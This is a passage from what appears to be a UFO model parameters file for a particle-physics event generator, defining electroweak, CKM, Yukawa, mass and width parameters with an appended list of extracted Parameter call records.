texname = '\\text{CKM3x1}')
CKM3x2 = Parameter(name = 'CKM3x2',
nature = 'internal',
type = 'complex',
value = '0',
texname = '\\text{CKM3x2}')
CKM3x3 = Parameter(name = 'CKM3x3',
nature = 'internal',
type = 'complex',
value = '1',
texname = '\\text{CKM3x3}')
MW = Parameter(name = 'MW',
nature = 'internal',
type = 'real',
value = 'cmath.sqrt(MZ**2/2. + cmath.sqrt(MZ**4/4. - (aEW*cmath.pi*MZ**2)/(Gf*cmath.sqrt(2))))',
texname = 'M_W')
ee = Parameter(name = 'ee',
nature = 'internal',
type = 'real',
value = '2*cmath.sqrt(aEW)*cmath.sqrt(cmath.pi)',
texname = 'e')
sw2 = Parameter(name = 'sw2',
nature = 'internal',
type = 'real',
value = '1 - MW**2/MZ**2',
texname = '\\text{sw2}')
cw = Parameter(name = 'cw',
nature = 'internal',
type = 'real',
value = 'cmath.sqrt(1 - sw2)',
texname = 'c_w')
sw = Parameter(name = 'sw',
nature = 'internal',
type = 'real',
value = 'cmath.sqrt(sw2)',
texname = 's_w')
g1 = Parameter(name = 'g1',
nature = 'internal',
type = 'real',
value = 'ee/cw',
texname = 'g_1')
gw = Parameter(name = 'gw',
nature = 'internal',
type = 'real',
value = 'ee/sw',
texname = 'g_w')
vev = Parameter(name = 'vev',
nature = 'internal',
type = 'real',
value = '(2*MW*sw)/ee',
texname = '\\text{vev}')
mfi = Parameter(name = 'mfi',
nature = 'internal',
type = 'real',
value = 'cmath.sqrt(100 - (kq*vev**2)/2.)',
texname = 'M_{\\text{fi}}')
AH = Parameter(name = 'AH',
nature = 'internal',
type = 'real',
value = '(47*ee**2*(1 - (2*MH**4)/(987.*MT**4) - (14*MH**2)/(705.*MT**2) + (213*MH**12)/(2.634632e7*MW**12) + (5*MH**10)/(119756.*MW**10) + (41*MH**8)/(180950.*MW**8) + (87*MH**6)/(65800.*MW**6) + (57*MH**4)/(6580.*MW**4) + (33*MH**2)/(470.*MW**2)))/(72.*cmath.pi**2*vev)',
texname = 'A_H')
GH = Parameter(name = 'GH',
nature = 'internal',
type = 'real',
value = '-(G**2*(1 + (13*MH**6)/(16800.*MT**6) + MH**4/(168.*MT**4) + (7*MH**2)/(120.*MT**2)))/(12.*cmath.pi**2*vev)',
texname = 'G_H')
Gphi = Parameter(name = 'Gphi',
nature = 'internal',
type = 'real',
value = '-(G**2*(1 + MH**6/(560.*MT**6) + MH**4/(90.*MT**4) + MH**2/(12.*MT**2)))/(8.*cmath.pi**2*vev)',
texname = 'G_h')
lam = Parameter(name = 'lam',
nature = 'internal',
type = 'real',
value = 'MH**2/(2.*vev**2)',
texname = '\\text{lam}')
yb = Parameter(name = 'yb',
nature = 'internal',
type = 'real',
value = '(ymb*cmath.sqrt(2))/vev',
texname = '\\text{yb}')
yc = Parameter(name = 'yc',
nature = 'internal',
type = 'real',
value = '(ymc*cmath.sqrt(2))/vev',
texname = '\\text{yc}')
ydo = Parameter(name = 'ydo',
nature = 'internal',
type = 'real',
value = '(ymdo*cmath.sqrt(2))/vev',
texname = '\\text{ydo}')
ye = Parameter(name = 'ye',
nature = 'internal',
type = 'real',
value = '(yme*cmath.sqrt(2))/vev',
texname = '\\text{ye}')
ym = Parameter(name = 'ym',
nature = 'internal',
type = 'real',
value = '(ymm*cmath.sqrt(2))/vev',
texname = '\\text{ym}')
ys = Parameter(name = 'ys',
nature = 'internal',
type = 'real',
value = '(yms*cmath.sqrt(2))/vev',
texname = '\\text{ys}')
yt = Parameter(name = 'yt',
nature = 'internal',
type = 'real',
value = '(ymt*cmath.sqrt(2))/vev',
texname = '\\text{yt}')
ytau = Parameter(name = 'ytau',
nature = 'internal',
type = 'real',
value = '(ymtau*cmath.sqrt(2))/vev',
texname = '\\text{ytau}')
yup = Parameter(name = 'yup',
nature = 'internal',
type = 'real',
value = '(ymup*cmath.sqrt(2))/vev',
texname = '\\text{yup}')
muH = Parameter(name = 'muH',
nature = 'internal',
type = 'real',
value = 'cmath.sqrt(lam*vev**2)',
texname = '\\mu')
| [
"object_library.Parameter"
]
| [((363, 448), 'object_library.Parameter', 'Parameter', ([], {'name': '"""ZERO"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""0.0"""', 'texname': '"""0"""'}), "(name='ZERO', nature='internal', type='real', value='0.0', texname='0'\n )\n", (372, 448), False, 'from object_library import all_parameters, Parameter\n'), ((557, 687), 'object_library.Parameter', 'Parameter', ([], {'name': '"""cabi"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(0.227736)', 'texname': '"""\\\\theta _c"""', 'lhablock': '"""CKMBLOCK"""', 'lhacode': '[1]'}), "(name='cabi', nature='external', type='real', value=0.227736,\n texname='\\\\theta _c', lhablock='CKMBLOCK', lhacode=[1])\n", (566, 687), False, 'from object_library import all_parameters, Parameter\n'), ((811, 942), 'object_library.Parameter', 'Parameter', ([], {'name': '"""aEWM1"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(127.9)', 'texname': '"""\\\\text{aEWM1}"""', 'lhablock': '"""SMINPUTS"""', 'lhacode': '[1]'}), "(name='aEWM1', nature='external', type='real', value=127.9,\n texname='\\\\text{aEWM1}', lhablock='SMINPUTS', lhacode=[1])\n", (820, 942), False, 'from object_library import all_parameters, Parameter\n'), ((1069, 1193), 'object_library.Parameter', 'Parameter', ([], {'name': '"""Gf"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(1.16637e-05)', 'texname': '"""G_f"""', 'lhablock': '"""SMINPUTS"""', 'lhacode': '[2]'}), "(name='Gf', nature='external', type='real', value=1.16637e-05,\n texname='G_f', lhablock='SMINPUTS', lhacode=[2])\n", (1078, 1193), False, 'from object_library import all_parameters, Parameter\n'), ((1303, 1430), 'object_library.Parameter', 'Parameter', ([], {'name': '"""aS"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(0.1184)', 'texname': '"""\\\\alpha _s"""', 'lhablock': '"""SMINPUTS"""', 'lhacode': '[3]'}), "(name='aS', nature='external', type='real', value=0.1184, texname=\n '\\\\alpha _s', lhablock='SMINPUTS', lhacode=[3])\n", (1312, 1430), False, 'from object_library import all_parameters, Parameter\n'), ((1540, 1669), 'object_library.Parameter', 'Parameter', ([], {'name': '"""ymdo"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(0.00504)', 'texname': '"""\\\\text{ymdo}"""', 'lhablock': '"""YUKAWA"""', 'lhacode': '[1]'}), "(name='ymdo', nature='external', type='real', value=0.00504,\n texname='\\\\text{ymdo}', lhablock='YUKAWA', lhacode=[1])\n", (1549, 1669), False, 'from object_library import all_parameters, Parameter\n'), ((1792, 1921), 'object_library.Parameter', 'Parameter', ([], {'name': '"""ymup"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(0.00255)', 'texname': '"""\\\\text{ymup}"""', 'lhablock': '"""YUKAWA"""', 'lhacode': '[2]'}), "(name='ymup', nature='external', type='real', value=0.00255,\n texname='\\\\text{ymup}', lhablock='YUKAWA', lhacode=[2])\n", (1801, 1921), False, 'from object_library import all_parameters, Parameter\n'), ((2043, 2169), 'object_library.Parameter', 'Parameter', ([], {'name': '"""yms"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(0.101)', 'texname': '"""\\\\text{yms}"""', 'lhablock': '"""YUKAWA"""', 'lhacode': '[3]'}), "(name='yms', nature='external', type='real', value=0.101, texname=\n '\\\\text{yms}', lhablock='YUKAWA', lhacode=[3])\n", (2052, 2169), False, 'from object_library import all_parameters, Parameter\n'), ((2284, 2409), 'object_library.Parameter', 'Parameter', ([], {'name': '"""ymc"""', 'nature': '"""external"""', 'type': 
'"""real"""', 'value': '(1.27)', 'texname': '"""\\\\text{ymc}"""', 'lhablock': '"""YUKAWA"""', 'lhacode': '[4]'}), "(name='ymc', nature='external', type='real', value=1.27, texname=\n '\\\\text{ymc}', lhablock='YUKAWA', lhacode=[4])\n", (2293, 2409), False, 'from object_library import all_parameters, Parameter\n'), ((2524, 2648), 'object_library.Parameter', 'Parameter', ([], {'name': '"""ymb"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(4.7)', 'texname': '"""\\\\text{ymb}"""', 'lhablock': '"""YUKAWA"""', 'lhacode': '[5]'}), "(name='ymb', nature='external', type='real', value=4.7, texname=\n '\\\\text{ymb}', lhablock='YUKAWA', lhacode=[5])\n", (2533, 2648), False, 'from object_library import all_parameters, Parameter\n'), ((2763, 2887), 'object_library.Parameter', 'Parameter', ([], {'name': '"""ymt"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(172)', 'texname': '"""\\\\text{ymt}"""', 'lhablock': '"""YUKAWA"""', 'lhacode': '[6]'}), "(name='ymt', nature='external', type='real', value=172, texname=\n '\\\\text{ymt}', lhablock='YUKAWA', lhacode=[6])\n", (2772, 2887), False, 'from object_library import all_parameters, Parameter\n'), ((3002, 3131), 'object_library.Parameter', 'Parameter', ([], {'name': '"""yme"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(0.000511)', 'texname': '"""\\\\text{yme}"""', 'lhablock': '"""YUKAWA"""', 'lhacode': '[11]'}), "(name='yme', nature='external', type='real', value=0.000511,\n texname='\\\\text{yme}', lhablock='YUKAWA', lhacode=[11])\n", (3011, 3131), False, 'from object_library import all_parameters, Parameter\n'), ((3247, 3375), 'object_library.Parameter', 'Parameter', ([], {'name': '"""ymm"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(0.10566)', 'texname': '"""\\\\text{ymm}"""', 'lhablock': '"""YUKAWA"""', 'lhacode': '[13]'}), "(name='ymm', nature='external', type='real', value=0.10566,\n texname='\\\\text{ymm}', lhablock='YUKAWA', lhacode=[13])\n", (3256, 3375), False, 'from object_library import all_parameters, Parameter\n'), ((3493, 3623), 'object_library.Parameter', 'Parameter', ([], {'name': '"""ymtau"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(1.777)', 'texname': '"""\\\\text{ymtau}"""', 'lhablock': '"""YUKAWA"""', 'lhacode': '[15]'}), "(name='ymtau', nature='external', type='real', value=1.777,\n texname='\\\\text{ymtau}', lhablock='YUKAWA', lhacode=[15])\n", (3502, 3623), False, 'from object_library import all_parameters, Parameter\n'), ((3750, 3868), 'object_library.Parameter', 'Parameter', ([], {'name': '"""kq"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(0.001)', 'texname': '"""k_q"""', 'lhablock': '"""FRBlock"""', 'lhacode': '[1]'}), "(name='kq', nature='external', type='real', value=0.001, texname=\n 'k_q', lhablock='FRBlock', lhacode=[1])\n", (3759, 3868), False, 'from object_library import all_parameters, Parameter\n'), ((3978, 4107), 'object_library.Parameter', 'Parameter', ([], {'name': '"""lamf"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(0.1)', 'texname': '"""l_{\\\\text{fi}}"""', 'lhablock': '"""FRBlock"""', 'lhacode': '[2]'}), "(name='lamf', nature='external', type='real', value=0.1, texname=\n 'l_{\\\\text{fi}}', lhablock='FRBlock', lhacode=[2])\n", (3987, 4107), False, 'from object_library import all_parameters, Parameter\n'), ((4230, 4364), 'object_library.Parameter', 'Parameter', ([], {'name': '"""yf1x1"""', 'nature': '"""external"""', 'type': '"""complex"""', 'value': '(0)', 'texname': 
'"""\\\\text{yf1x1}"""', 'lhablock': '"""FRBlock6"""', 'lhacode': '[1, 1]'}), "(name='yf1x1', nature='external', type='complex', value=0, texname\n ='\\\\text{yf1x1}', lhablock='FRBlock6', lhacode=[1, 1])\n", (4239, 4364), False, 'from object_library import all_parameters, Parameter\n'), ((4493, 4627), 'object_library.Parameter', 'Parameter', ([], {'name': '"""yf1x2"""', 'nature': '"""external"""', 'type': '"""complex"""', 'value': '(0)', 'texname': '"""\\\\text{yf1x2}"""', 'lhablock': '"""FRBlock6"""', 'lhacode': '[1, 2]'}), "(name='yf1x2', nature='external', type='complex', value=0, texname\n ='\\\\text{yf1x2}', lhablock='FRBlock6', lhacode=[1, 2])\n", (4502, 4627), False, 'from object_library import all_parameters, Parameter\n'), ((4756, 4890), 'object_library.Parameter', 'Parameter', ([], {'name': '"""yf1x3"""', 'nature': '"""external"""', 'type': '"""complex"""', 'value': '(0)', 'texname': '"""\\\\text{yf1x3}"""', 'lhablock': '"""FRBlock6"""', 'lhacode': '[1, 3]'}), "(name='yf1x3', nature='external', type='complex', value=0, texname\n ='\\\\text{yf1x3}', lhablock='FRBlock6', lhacode=[1, 3])\n", (4765, 4890), False, 'from object_library import all_parameters, Parameter\n'), ((5019, 5153), 'object_library.Parameter', 'Parameter', ([], {'name': '"""yf2x1"""', 'nature': '"""external"""', 'type': '"""complex"""', 'value': '(0)', 'texname': '"""\\\\text{yf2x1}"""', 'lhablock': '"""FRBlock6"""', 'lhacode': '[2, 1]'}), "(name='yf2x1', nature='external', type='complex', value=0, texname\n ='\\\\text{yf2x1}', lhablock='FRBlock6', lhacode=[2, 1])\n", (5028, 5153), False, 'from object_library import all_parameters, Parameter\n'), ((5282, 5416), 'object_library.Parameter', 'Parameter', ([], {'name': '"""yf2x2"""', 'nature': '"""external"""', 'type': '"""complex"""', 'value': '(0)', 'texname': '"""\\\\text{yf2x2}"""', 'lhablock': '"""FRBlock6"""', 'lhacode': '[2, 2]'}), "(name='yf2x2', nature='external', type='complex', value=0, texname\n ='\\\\text{yf2x2}', lhablock='FRBlock6', lhacode=[2, 2])\n", (5291, 5416), False, 'from object_library import all_parameters, Parameter\n'), ((5545, 5682), 'object_library.Parameter', 'Parameter', ([], {'name': '"""yf2x3"""', 'nature': '"""external"""', 'type': '"""complex"""', 'value': '(1e-06)', 'texname': '"""\\\\text{yf2x3}"""', 'lhablock': '"""FRBlock6"""', 'lhacode': '[2, 3]'}), "(name='yf2x3', nature='external', type='complex', value=1e-06,\n texname='\\\\text{yf2x3}', lhablock='FRBlock6', lhacode=[2, 3])\n", (5554, 5682), False, 'from object_library import all_parameters, Parameter\n'), ((5812, 5946), 'object_library.Parameter', 'Parameter', ([], {'name': '"""yf3x1"""', 'nature': '"""external"""', 'type': '"""complex"""', 'value': '(0)', 'texname': '"""\\\\text{yf3x1}"""', 'lhablock': '"""FRBlock6"""', 'lhacode': '[3, 1]'}), "(name='yf3x1', nature='external', type='complex', value=0, texname\n ='\\\\text{yf3x1}', lhablock='FRBlock6', lhacode=[3, 1])\n", (5821, 5946), False, 'from object_library import all_parameters, Parameter\n'), ((6075, 6209), 'object_library.Parameter', 'Parameter', ([], {'name': '"""yf3x2"""', 'nature': '"""external"""', 'type': '"""complex"""', 'value': '(0)', 'texname': '"""\\\\text{yf3x2}"""', 'lhablock': '"""FRBlock6"""', 'lhacode': '[3, 2]'}), "(name='yf3x2', nature='external', type='complex', value=0, texname\n ='\\\\text{yf3x2}', lhablock='FRBlock6', lhacode=[3, 2])\n", (6084, 6209), False, 'from object_library import all_parameters, Parameter\n'), ((6338, 6472), 'object_library.Parameter', 'Parameter', ([], {'name': 
'"""yf3x3"""', 'nature': '"""external"""', 'type': '"""complex"""', 'value': '(0)', 'texname': '"""\\\\text{yf3x3}"""', 'lhablock': '"""FRBlock6"""', 'lhacode': '[3, 3]'}), "(name='yf3x3', nature='external', type='complex', value=0, texname\n ='\\\\text{yf3x3}', lhablock='FRBlock6', lhacode=[3, 3])\n", (6347, 6472), False, 'from object_library import all_parameters, Parameter\n'), ((6598, 6723), 'object_library.Parameter', 'Parameter', ([], {'name': '"""MZ"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(91.1876)', 'texname': '"""\\\\text{MZ}"""', 'lhablock': '"""MASS"""', 'lhacode': '[23]'}), "(name='MZ', nature='external', type='real', value=91.1876, texname\n ='\\\\text{MZ}', lhablock='MASS', lhacode=[23])\n", (6607, 6723), False, 'from object_library import all_parameters, Parameter\n'), ((6831, 6956), 'object_library.Parameter', 'Parameter', ([], {'name': '"""Me"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(0.000511)', 'texname': '"""\\\\text{Me}"""', 'lhablock': '"""MASS"""', 'lhacode': '[11]'}), "(name='Me', nature='external', type='real', value=0.000511,\n texname='\\\\text{Me}', lhablock='MASS', lhacode=[11])\n", (6840, 6956), False, 'from object_library import all_parameters, Parameter\n'), ((7066, 7192), 'object_library.Parameter', 'Parameter', ([], {'name': '"""MMU"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(0.10566)', 'texname': '"""\\\\text{MMU}"""', 'lhablock': '"""MASS"""', 'lhacode': '[13]'}), "(name='MMU', nature='external', type='real', value=0.10566,\n texname='\\\\text{MMU}', lhablock='MASS', lhacode=[13])\n", (7075, 7192), False, 'from object_library import all_parameters, Parameter\n'), ((7308, 7433), 'object_library.Parameter', 'Parameter', ([], {'name': '"""MTA"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(1.777)', 'texname': '"""\\\\text{MTA}"""', 'lhablock': '"""MASS"""', 'lhacode': '[15]'}), "(name='MTA', nature='external', type='real', value=1.777, texname=\n '\\\\text{MTA}', lhablock='MASS', lhacode=[15])\n", (7317, 7433), False, 'from object_library import all_parameters, Parameter\n'), ((7547, 7662), 'object_library.Parameter', 'Parameter', ([], {'name': '"""MU"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(0.00255)', 'texname': '"""M"""', 'lhablock': '"""MASS"""', 'lhacode': '[2]'}), "(name='MU', nature='external', type='real', value=0.00255, texname\n ='M', lhablock='MASS', lhacode=[2])\n", (7556, 7662), False, 'from object_library import all_parameters, Parameter\n'), ((7770, 7891), 'object_library.Parameter', 'Parameter', ([], {'name': '"""MC"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(1.27)', 'texname': '"""\\\\text{MC}"""', 'lhablock': '"""MASS"""', 'lhacode': '[4]'}), "(name='MC', nature='external', type='real', value=1.27, texname=\n '\\\\text{MC}', lhablock='MASS', lhacode=[4])\n", (7779, 7891), False, 'from object_library import all_parameters, Parameter\n'), ((7999, 8119), 'object_library.Parameter', 'Parameter', ([], {'name': '"""MT"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(172)', 'texname': '"""\\\\text{MT}"""', 'lhablock': '"""MASS"""', 'lhacode': '[6]'}), "(name='MT', nature='external', type='real', value=172, texname=\n '\\\\text{MT}', lhablock='MASS', lhacode=[6])\n", (8008, 8119), False, 'from object_library import all_parameters, Parameter\n'), ((8227, 8351), 'object_library.Parameter', 'Parameter', ([], {'name': '"""MD"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(0.00504)', 
'texname': '"""\\\\text{MD}"""', 'lhablock': '"""MASS"""', 'lhacode': '[1]'}), "(name='MD', nature='external', type='real', value=0.00504, texname\n ='\\\\text{MD}', lhablock='MASS', lhacode=[1])\n", (8236, 8351), False, 'from object_library import all_parameters, Parameter\n'), ((8459, 8581), 'object_library.Parameter', 'Parameter', ([], {'name': '"""MS"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(0.101)', 'texname': '"""\\\\text{MS}"""', 'lhablock': '"""MASS"""', 'lhacode': '[3]'}), "(name='MS', nature='external', type='real', value=0.101, texname=\n '\\\\text{MS}', lhablock='MASS', lhacode=[3])\n", (8468, 8581), False, 'from object_library import all_parameters, Parameter\n'), ((8689, 8809), 'object_library.Parameter', 'Parameter', ([], {'name': '"""MB"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(4.7)', 'texname': '"""\\\\text{MB}"""', 'lhablock': '"""MASS"""', 'lhacode': '[5]'}), "(name='MB', nature='external', type='real', value=4.7, texname=\n '\\\\text{MB}', lhablock='MASS', lhacode=[5])\n", (8698, 8809), False, 'from object_library import all_parameters, Parameter\n'), ((8917, 9038), 'object_library.Parameter', 'Parameter', ([], {'name': '"""MH"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(125)', 'texname': '"""\\\\text{MH}"""', 'lhablock': '"""MASS"""', 'lhacode': '[25]'}), "(name='MH', nature='external', type='real', value=125, texname=\n '\\\\text{MH}', lhablock='MASS', lhacode=[25])\n", (8926, 9038), False, 'from object_library import all_parameters, Parameter\n'), ((9146, 9272), 'object_library.Parameter', 'Parameter', ([], {'name': '"""MP"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(120)', 'texname': '"""\\\\text{MP}"""', 'lhablock': '"""MASS"""', 'lhacode': '[9000005]'}), "(name='MP', nature='external', type='real', value=120, texname=\n '\\\\text{MP}', lhablock='MASS', lhacode=[9000005])\n", (9155, 9272), False, 'from object_library import all_parameters, Parameter\n'), ((9381, 9508), 'object_library.Parameter', 'Parameter', ([], {'name': '"""Mfi"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(10)', 'texname': '"""\\\\text{Mfi}"""', 'lhablock': '"""MASS"""', 'lhacode': '[9000006]'}), "(name='Mfi', nature='external', type='real', value=10, texname=\n '\\\\text{Mfi}', lhablock='MASS', lhacode=[9000006])\n", (9390, 9508), False, 'from object_library import all_parameters, Parameter\n'), ((9622, 9747), 'object_library.Parameter', 'Parameter', ([], {'name': '"""WZ"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(2.4952)', 'texname': '"""\\\\text{WZ}"""', 'lhablock': '"""DECAY"""', 'lhacode': '[23]'}), "(name='WZ', nature='external', type='real', value=2.4952, texname=\n '\\\\text{WZ}', lhablock='DECAY', lhacode=[23])\n", (9631, 9747), False, 'from object_library import all_parameters, Parameter\n'), ((9855, 9979), 'object_library.Parameter', 'Parameter', ([], {'name': '"""WW"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(2.085)', 'texname': '"""\\\\text{WW}"""', 'lhablock': '"""DECAY"""', 'lhacode': '[24]'}), "(name='WW', nature='external', type='real', value=2.085, texname=\n '\\\\text{WW}', lhablock='DECAY', lhacode=[24])\n", (9864, 9979), False, 'from object_library import all_parameters, Parameter\n'), ((10087, 10214), 'object_library.Parameter', 'Parameter', ([], {'name': '"""WT"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(1.50833649)', 'texname': '"""\\\\text{WT}"""', 'lhablock': '"""DECAY"""', 'lhacode': '[6]'}), 
"(name='WT', nature='external', type='real', value=1.50833649,\n texname='\\\\text{WT}', lhablock='DECAY', lhacode=[6])\n", (10096, 10214), False, 'from object_library import all_parameters, Parameter\n'), ((10323, 10451), 'object_library.Parameter', 'Parameter', ([], {'name': '"""WH"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(0.00589569)', 'texname': '"""\\\\text{WH}"""', 'lhablock': '"""DECAY"""', 'lhacode': '[25]'}), "(name='WH', nature='external', type='real', value=0.00589569,\n texname='\\\\text{WH}', lhablock='DECAY', lhacode=[25])\n", (10332, 10451), False, 'from object_library import all_parameters, Parameter\n'), ((10561, 10699), 'object_library.Parameter', 'Parameter', ([], {'name': '"""WH1"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(0.00575308848)', 'texname': '"""\\\\text{WH1}"""', 'lhablock': '"""DECAY"""', 'lhacode': '[9000005]'}), "(name='WH1', nature='external', type='real', value=0.00575308848,\n texname='\\\\text{WH1}', lhablock='DECAY', lhacode=[9000005])\n", (10570, 10699), False, 'from object_library import all_parameters, Parameter\n'), ((10815, 10951), 'object_library.Parameter', 'Parameter', ([], {'name': '"""Wfi"""', 'nature': '"""external"""', 'type': '"""real"""', 'value': '(6.03044e-09)', 'texname': '"""\\\\text{Wfi}"""', 'lhablock': '"""DECAY"""', 'lhacode': '[9000006]'}), "(name='Wfi', nature='external', type='real', value=6.03044e-09,\n texname='\\\\text{Wfi}', lhablock='DECAY', lhacode=[9000006])\n", (10824, 10951), False, 'from object_library import all_parameters, Parameter\n'), ((11066, 11173), 'object_library.Parameter', 'Parameter', ([], {'name': '"""aEW"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""1/aEWM1"""', 'texname': '"""\\\\alpha _{\\\\text{EW}}"""'}), "(name='aEW', nature='internal', type='real', value='1/aEWM1',\n texname='\\\\alpha _{\\\\text{EW}}')\n", (11075, 11173), False, 'from object_library import all_parameters, Parameter\n'), ((11249, 11365), 'object_library.Parameter', 'Parameter', ([], {'name': '"""G"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""2*cmath.sqrt(aS)*cmath.sqrt(cmath.pi)"""', 'texname': '"""G"""'}), "(name='G', nature='internal', type='real', value=\n '2*cmath.sqrt(aS)*cmath.sqrt(cmath.pi)', texname='G')\n", (11258, 11365), False, 'from object_library import all_parameters, Parameter\n'), ((11437, 11552), 'object_library.Parameter', 'Parameter', ([], {'name': '"""CKM1x1"""', 'nature': '"""internal"""', 'type': '"""complex"""', 'value': '"""cmath.cos(cabi)"""', 'texname': '"""\\\\text{CKM1x1}"""'}), "(name='CKM1x1', nature='internal', type='complex', value=\n 'cmath.cos(cabi)', texname='\\\\text{CKM1x1}')\n", (11446, 11552), False, 'from object_library import all_parameters, Parameter\n'), ((11644, 11759), 'object_library.Parameter', 'Parameter', ([], {'name': '"""CKM1x2"""', 'nature': '"""internal"""', 'type': '"""complex"""', 'value': '"""cmath.sin(cabi)"""', 'texname': '"""\\\\text{CKM1x2}"""'}), "(name='CKM1x2', nature='internal', type='complex', value=\n 'cmath.sin(cabi)', texname='\\\\text{CKM1x2}')\n", (11653, 11759), False, 'from object_library import all_parameters, Parameter\n'), ((11851, 11951), 'object_library.Parameter', 'Parameter', ([], {'name': '"""CKM1x3"""', 'nature': '"""internal"""', 'type': '"""complex"""', 'value': '"""0"""', 'texname': '"""\\\\text{CKM1x3}"""'}), "(name='CKM1x3', nature='internal', type='complex', value='0',\n texname='\\\\text{CKM1x3}')\n", (11860, 11951), False, 'from object_library import 
all_parameters, Parameter\n'), ((12044, 12160), 'object_library.Parameter', 'Parameter', ([], {'name': '"""CKM2x1"""', 'nature': '"""internal"""', 'type': '"""complex"""', 'value': '"""-cmath.sin(cabi)"""', 'texname': '"""\\\\text{CKM2x1}"""'}), "(name='CKM2x1', nature='internal', type='complex', value=\n '-cmath.sin(cabi)', texname='\\\\text{CKM2x1}')\n", (12053, 12160), False, 'from object_library import all_parameters, Parameter\n'), ((12252, 12367), 'object_library.Parameter', 'Parameter', ([], {'name': '"""CKM2x2"""', 'nature': '"""internal"""', 'type': '"""complex"""', 'value': '"""cmath.cos(cabi)"""', 'texname': '"""\\\\text{CKM2x2}"""'}), "(name='CKM2x2', nature='internal', type='complex', value=\n 'cmath.cos(cabi)', texname='\\\\text{CKM2x2}')\n", (12261, 12367), False, 'from object_library import all_parameters, Parameter\n'), ((12459, 12559), 'object_library.Parameter', 'Parameter', ([], {'name': '"""CKM2x3"""', 'nature': '"""internal"""', 'type': '"""complex"""', 'value': '"""0"""', 'texname': '"""\\\\text{CKM2x3}"""'}), "(name='CKM2x3', nature='internal', type='complex', value='0',\n texname='\\\\text{CKM2x3}')\n", (12468, 12559), False, 'from object_library import all_parameters, Parameter\n'), ((12652, 12752), 'object_library.Parameter', 'Parameter', ([], {'name': '"""CKM3x1"""', 'nature': '"""internal"""', 'type': '"""complex"""', 'value': '"""0"""', 'texname': '"""\\\\text{CKM3x1}"""'}), "(name='CKM3x1', nature='internal', type='complex', value='0',\n texname='\\\\text{CKM3x1}')\n", (12661, 12752), False, 'from object_library import all_parameters, Parameter\n'), ((12845, 12945), 'object_library.Parameter', 'Parameter', ([], {'name': '"""CKM3x2"""', 'nature': '"""internal"""', 'type': '"""complex"""', 'value': '"""0"""', 'texname': '"""\\\\text{CKM3x2}"""'}), "(name='CKM3x2', nature='internal', type='complex', value='0',\n texname='\\\\text{CKM3x2}')\n", (12854, 12945), False, 'from object_library import all_parameters, Parameter\n'), ((13038, 13138), 'object_library.Parameter', 'Parameter', ([], {'name': '"""CKM3x3"""', 'nature': '"""internal"""', 'type': '"""complex"""', 'value': '"""1"""', 'texname': '"""\\\\text{CKM3x3}"""'}), "(name='CKM3x3', nature='internal', type='complex', value='1',\n texname='\\\\text{CKM3x3}')\n", (13047, 13138), False, 'from object_library import all_parameters, Parameter\n'), ((13227, 13399), 'object_library.Parameter', 'Parameter', ([], {'name': '"""MW"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""cmath.sqrt(MZ**2/2. + cmath.sqrt(MZ**4/4. - (aEW*cmath.pi*MZ**2)/(Gf*cmath.sqrt(2))))"""', 'texname': '"""M_W"""'}), "(name='MW', nature='internal', type='real', value=\n 'cmath.sqrt(MZ**2/2. + cmath.sqrt(MZ**4/4. 
- (aEW*cmath.pi*MZ**2)/(Gf*cmath.sqrt(2))))'\n , texname='M_W')\n", (13236, 13399), False, 'from object_library import all_parameters, Parameter\n'), ((13466, 13584), 'object_library.Parameter', 'Parameter', ([], {'name': '"""ee"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""2*cmath.sqrt(aEW)*cmath.sqrt(cmath.pi)"""', 'texname': '"""e"""'}), "(name='ee', nature='internal', type='real', value=\n '2*cmath.sqrt(aEW)*cmath.sqrt(cmath.pi)', texname='e')\n", (13475, 13584), False, 'from object_library import all_parameters, Parameter\n'), ((13657, 13763), 'object_library.Parameter', 'Parameter', ([], {'name': '"""sw2"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""1 - MW**2/MZ**2"""', 'texname': '"""\\\\text{sw2}"""'}), "(name='sw2', nature='internal', type='real', value=\n '1 - MW**2/MZ**2', texname='\\\\text{sw2}')\n", (13666, 13763), False, 'from object_library import all_parameters, Parameter\n'), ((13839, 13940), 'object_library.Parameter', 'Parameter', ([], {'name': '"""cw"""', 'nature': '"""internal"""', 'type': '"""real"""', 'value': '"""cmath.sqrt(1 - sw2)"""', 'texname': '"""c_w"""'}), "(name='cw', nature='internal', type='real', value=\n 'cmath.sqrt(1 - sw2)', texname='c_w')\n", (13848, 13940), False, 'from object_library import all_parameters, Parameter\n'), ((14012, 14109), 'object_library.Parameter', 'Parameter', ([], {'name': '"""sw"""', 